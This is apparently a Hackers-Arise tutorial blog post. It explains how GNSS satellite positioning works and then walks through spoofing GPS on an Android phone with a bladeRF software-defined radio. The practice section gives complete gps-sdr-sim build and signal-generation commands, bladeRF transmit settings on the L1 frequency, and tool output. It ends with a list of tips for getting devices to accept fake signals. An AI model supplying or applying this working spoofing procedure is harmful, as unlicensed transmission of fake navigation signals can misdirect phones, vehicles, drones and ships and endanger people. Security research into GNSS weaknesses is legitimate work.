Welcome back, aspiring cyberwarriors!
Today, we would like to move one layer deeper into the world of software defined radio. Using SDR hardware and openly available tools, we will look at how GNSS signals are generated, transmitted and trusted by receiving devices. This topic matters more than it might seem. Phones, drones, cars, and many automated systems treat location data as ground truth, yet that data comes from radio signals that can be generated by anyone who understands the system well enough.
GPS spoofing can represent a real threat. A group of students from the University of Texas designed and successfully tested a GPS spoofing device capable of generating fake GPS signals. During testing, the students managed to “hijack,” meaning alter the course of, a 65 meter yacht called “White Rose,” valued at 80 million dollars, in the Mediterranean Sea by placing the equipment onboard the vessel. All of the equipment, a laptop and a small antenna, had a total cost of no more than 3,000 dollars.
The device’s operating principle is shown in the video.
Theory
Before we start doing anything, we need to understand the theory.
GNSS
The Global Navigation Satellite System, or GNSS, is the technology that allows devices to determine their geographic location anywhere on Earth. In simple terms, GNSS is not a single system but a collection of satellite constellations and supporting ground infrastructure working together. The most well-known example is the American GPS system, but it is not the only one. Other major systems include Galileo, operated by European Union countries, BeiDou from China, and the Russian GLONASS system. All GNSS systems follow the same general architectural idea. To determine a location, three major groups of components are involved: the space segment, the control segment on the ground, and the user segment.
The space segment consists of satellites orbiting the Earth. Each navigation system has its own constellation of satellites flying in carefully calculated orbits. These satellites continuously transmit navigation data using specific radio frequencies and precise timing. Different systems use different frequencies and transmission schedules so that they can coexist without interfering with one another.
The ground-based, or control, segment is responsible for keeping the entire system reliable. Ground stations monitor satellite health, synchronize their atomic clocks, correct orbital drift, and upload updated navigation data. This ensures that the information broadcast by satellites remains accurate. Without this segment, small timing errors would quickly accumulate and make location calculations unreliable.
The user segment consists of all receiving devices. The most familiar example is the GNSS receiver inside a smartphone, but this category also includes car navigation systems, drones, aviation equipment, maritime systems, and countless embedded devices.
To determine its position, a receiver must collect signals from multiple satellites and process them mathematically. This process is commonly referred to as triangulation, although in practice other mathematical approaches are used as well. What matters is that the receiver performs all calculations locally. Satellites do not know where you are, and your device does not transmit its position back to them.
Frequencies
GNSS systems transmit data over specific radio frequencies. Understanding these frequencies is important, especially when discussing spoofing, jamming, or signal simulation. While each satellite system has its own details, most civilian GNSS systems operate within three main frequency bands known as L1, L2, and L5.
Together, these bands form what is known as the L band, or the decimeter wave band. This range covers frequencies from roughly 1 to 2 GHz, or 1000 to 2000 MHz. Multiple navigation systems can operate within the same band at the same time. For example, GPS, GLONASS, and Galileo all transmit signals in the L1 band simultaneously.
The L1 band is the oldest and most widely supported. Almost all GNSS receivers can process L1 signals. Its main disadvantage is poor penetration. Signals in this range do not bend well around obstacles and are easily weakened by buildings, dense foliage, terrain, or even certain atmospheric conditions.
The L2 band was introduced later as an improvement. Signals in this band are more resilient and can sometimes be received in environments where L1 struggles. Because L2 is newer, many devices use it together with L1 to improve accuracy and reliability rather than relying on it alone.
The L5 band is the newest and most advanced. It was designed primarily for aviation and safety critical applications, offering higher precision and better resistance to interference. Some civilian receivers can use L5, but it is still less common than L1 and L2.
Different frequencies are assigned different purposes. Frequencies marked as ARNS are typically reserved for aviation, while RNSS frequencies are used for general navigation by civilian ground receivers.
More Details About Bands and Frequencies
GPS is unique in that it operates across all three bands, while other navigation systems do not yet occupy every available frequency. In the L1 band, GPS transmits at 1575.42 MHz. Galileo uses the same frequency, while GLONASS operates slightly higher, around 1602 MHz.
In the L2 band, GPS transmits at 1227.6 MHz, and GLONASS operates at approximately 1246 MHz.
In the L5 band, Galileo uses two frequencies, 1207.14 MHz and 1176.45 MHz, while GPS uses only one frequency at 1176.45 MHz.
Civilian and military signals are separated. Military GNSS signals are far more precise and resistant to interference, but they are encrypted specifically to prevent unauthorized use. In this article, we focus only on civilian signals. It is important to understand that a satellite never sends your location to you. Each receiver calculates its own position independently. To do this, it must receive signals from multiple satellites at the same time, usually at least three or four. Each satellite transmits its own position and a highly precise timestamp. Using these values, the receiver calculates how far away each satellite is and determines its own coordinates.
Two main mathematical approaches are used for this calculation: triangulation and trilateration.
Triangulation determines position using angles between reference points. While this method works well in theory, it becomes impractical with satellites located approximately 20,000 kilometers above Earth. Measuring angles with sufficient precision at that distance is extremely difficult.
Instead, GNSS systems rely on trilateration. In this method, the receiver calculates its position based on distances rather than angles. Each satellite defines a sphere with a radius equal to the distance between the satellite and the receiver. The receiver’s position lies at the intersection of these spheres. Distance is calculated by multiplying the signal’s travel time by the speed of light. This requires extremely precise timing, which is why atomic clocks are such a critical component of GNSS systems.
TTFF
TTFF stands for Time To First Fix. It describes how long a GNSS receiver needs to determine its location after being powered on or reset. This parameter is especially important when discussing spoofing and signal simulation. If a device has no stored satellite data, the initial fix can take up to twelve minutes in the worst case. In practice, it usually takes two to three minutes. Devices that already have partial satellite data can achieve a fix much faster.
Practice
There are many GPS spoofing guides available online, but most of them no longer work reliably. Modern smartphones rarely rely on GNSS alone. They often combine satellite data with Wi-Fi positioning, Bluetooth beacons, and even cellular tower information. To better understand these challenges, we begin with a practical experiment. The goal is to spoof GPS data on an Android smartphone and observe how modern devices react to manipulated satellite signals.
Equipment
In this experiment, the following equipment is used:
1. BladeRF 2.0 Micro xA4 as a transmitter
2. HackRF One as a receiver and transmitter
3. An RFSPACE antenna
4. Mi A2 smartphone
Each of these components plays a specific role in generating, transmitting, and observing spoofed GNSS signals.
GPS-SDR-SIM
GPS-SDR-SIM is a tool that allows the generation of GNSS data for any chosen location or movement path. To do this, it uses ephemeris data, which contains satellite position information for a specific time window. This tool is one of the most popular and widely known GPS spoofing utilities. At the time of writing, its repository has accumulated over 3,000 stars and is actively maintained.
We begin by downloading the source code and building the program.
bash# > git clone https://github.com/Nuand/gps-sdr-sim
bash# > cd gps-sdr-sim
bash# > gcc gpssim.c -lm -O3 -o gps-sdr-simOnce compiled, the bladeRF is connected and used to generate a signal file.
bash# > ./gps-sdr-sim -e hour3060.22n -l 21.296965,-157.815687,100 -b 16 -o gpssim.bin -t $(date -u +%Y/%m/%d,+%X)Satellite data can be downloaded from NASA. Here, data is provided for each hour, which makes it possible to avoid time-related errors. This solves the issue that exists in many other guides.
The -t parameter specifies how long the simulated satellites will transmit data. This parameter is critical. Modern smartphones reject navigation data that is even a few hours out of date.
Using static location mode.
Start time = 2025/12/05,11:26:00 (2234:285693)
Duration = 300.0 [sec]
02 180.0 25.6 22759545.5 6.5
06 54.7 20.9 23631267.8 5.3
11 90.0 38.3 22154769.5 4.3
12 355.4 46.2 21368898.6 4.0
13 163.0 4.3 25471171.1 10.3
15 186.1 19.4 24115672.2 7.7
19 38.7 3.5 25179568.2 5.6
20 119.8 1.4 25729982.2 7.7
24 102.8 78.9 20375053.9 3.1
25 312.8 32.9 22268020.3 5.5
29 231.8 37.9 22208289.9 5.3
32 306.8 14.9 24242464.5 8.5
Time into run = 300.0
Done!
Process time = 46.2 [sec]An Invalid Start Time error should not cause concern. It simply indicates that the ephemeris data has not yet been updated on the NASA servers. Waiting for new data and repeating the process usually resolves the issue.
bash# > bladeRF-cli -i
bladeRF > set frequency 1575.42M
For best results, it is not recommended to set both RX and TX to the
same frequency. Instead, consider offsetting them by at least 1 MHz
and mixing digitally.
For the above reason, 'set frequency' is deprecated and
scheduled for removal in future bladeRF-cli versions.
Please use 'set frequency rx' and 'set frequency tx' to configure
channels individually.
RX1 Frequency: 1575419998 Hz (Range: [70000000, 6000000000])
RX2 Frequency: 1575419998 Hz (Range: [70000000, 6000000000])
TX1 Frequency: 1575419998 Hz (Range: [47000000, 6000000000])
TX2 Frequency: 1575419998 Hz (Range: [47000000, 6000000000])
bladeRF > set samplerate 2.6M
Setting RX1 sample rate - req: 2600000 0/1Hz, actual: 2600000 0/1Hz
Setting RX2 sample rate - req: 2600000 0/1Hz, actual: 2600000 0/1Hz
Setting TX1 sample rate - req: 2600000 0/1Hz, actual: 2600000 0/1Hz
Setting TX2 sample rate - req: 2600000 0/1Hz, actual: 2600000 0/1Hz
bladeRF > set bandwidth 2.5M
RX1 Bandwidth: 2500000 Hz (Range: [200000, 56000000])
RX2 Bandwidth: 2500000 Hz (Range: [200000, 56000000])
TX1 Bandwidth: 2500000 Hz (Range: [200000, 56000000])
TX2 Bandwidth: 2500000 Hz (Range: [200000, 56000000])
bladeRF > set gain tx 56
Setting TX1 overall gain to 56 dB
Gain TX1 overall: 56 dB (Range: [-23.75, 66])
dsa: -90 dB (Range: [-89.75, 0])
bladeRF > tx config file=/home/user/gps-sdr-sim/gpssim.bin format=bin
bladeRF > tx start
bladeRF > tx waitOnce the signal file is ready, a GPS monitoring application such as GPS Test is installed on the smartphone. Transmission is started from the computer, and the phone begins displaying satellites with strong signal levels.
At this stage, the device still reports No Fix. This means that satellites are visible, but the system refuses to calculate a position. The green lines shown on the screen represent spoofed satellites generated by the bladeRF. Everything appears functional, yet the phone remains unconvinced. To rule out timing issues, the phone is rebooted and transmission is left running for five minutes. The result remains unchanged. Because the coordinate file is slightly outdated, the phone’s system time is adjusted backward, and the spoofed location is shifted only one kilometer away from the real location. Large, sudden jumps are often rejected as implausible, so gradual movement is essential.
bash# > ./gps-sdr-sim -e brdc2025_3060.25n -d 1000 -l 51.296965,124.815687,100 -b 16 -o gpssim.bin -t 2025/12/05,12:00:00
Using static location mode.
Start time = 2025/12/05,12:00:00 (2234:288000)
Duration = 1000.0 [sec]
02 174.0 43.6 21497540.2 3.6
05 140.4 4.3 25351515.3 6.8
06 41.5 11.5 24590008.1 4.2
11 66.9 36.4 22296887.8 3.3
12 20.6 45.8 21422074.0 3.1
15 176.8 7.9 25304780.7 8.2
18 198.6 4.3 25335825.2 10.3
20 104.6 6.7 25172344.8 4.8
22 314.6 4.6 25557500.2 8.9
24 146.6 63.7 20898055.3 2.7
25 332.2 40.0 21745559.7 3.7
29 253.1 49.9 21398805.8 3.4
32 290.3 19.4 23734754.8 6.5
Time into run = 1000.0
Done!
Process time = 142.4 [sec]We start the transmission again and look at the result:
This time, the status changes to 3D Fix. The device accepts the location. The satellite time is slightly behind the phone’s internal clock but remains within acceptable limits. Depending on the device, satellite data can remain valid anywhere from thirty minutes to four hours. The phone’s actual system time differs by thirty-four minutes, which is considered normal when no real satellites are visible.
What to Pay Attention To
There are several practical rules that greatly increase the chances of successful GPS spoofing.
1. Always monitor ephemeris data from NASA, as it is updated frequently.
2. Pay close attention to the time transmitted by spoofed satellites. Many devices reject heavily outdated data.
3. Allow enough time for the device to store and process fake satellite information.
4. Avoid large, sudden changes in location. Gradual movement appears far more realistic.
5. Be aware of Wi-Fi and cellular positioning. Even if GNSS is spoofed, these can override location on some devices.
6. Use a proper antenna designed for GNSS frequencies.
7. When using HackRF, verify the presence of an external crystal oscillator to prevent timing drift.
Because satellites visible in one geographic region differ from those in another, spoofing only the satellites commonly observed at the current location improves success rates.
8. Some mapping applications rely on third-party data sources. Apple Maps and Google Maps may report different positions, with Google often appearing more accurate.
9. Clearing old GPS data significantly improves spoofing success.
10. Setting the system time as close as possible to real satellite time increases reliability. If that fails, waiting ten to fifteen minutes often allows the device to accept new data.
Summary
Despite continuous improvements by device manufacturers, GPS spoofing remains possible under specific conditions. As more autonomous and location dependent systems enter daily life, this issue becomes increasingly serious. Spoofing a phone for amusement is one thing. Influencing the navigation decisions of autonomous vehicles or drones is something entirely different. And that is something we need to be concerned about.
For readers who want to go further, we have our training on Satellite Hacking. The course introduces the fundamentals of satellite signal interception, common security weaknesses, and real‑world attack surfaces in space‑based technologies.
Source: HackersArise
Source Link: https://hackers-arise.com/sdr-signals-intelligence-for-hackers-building-your-own-fake-gps-satellite/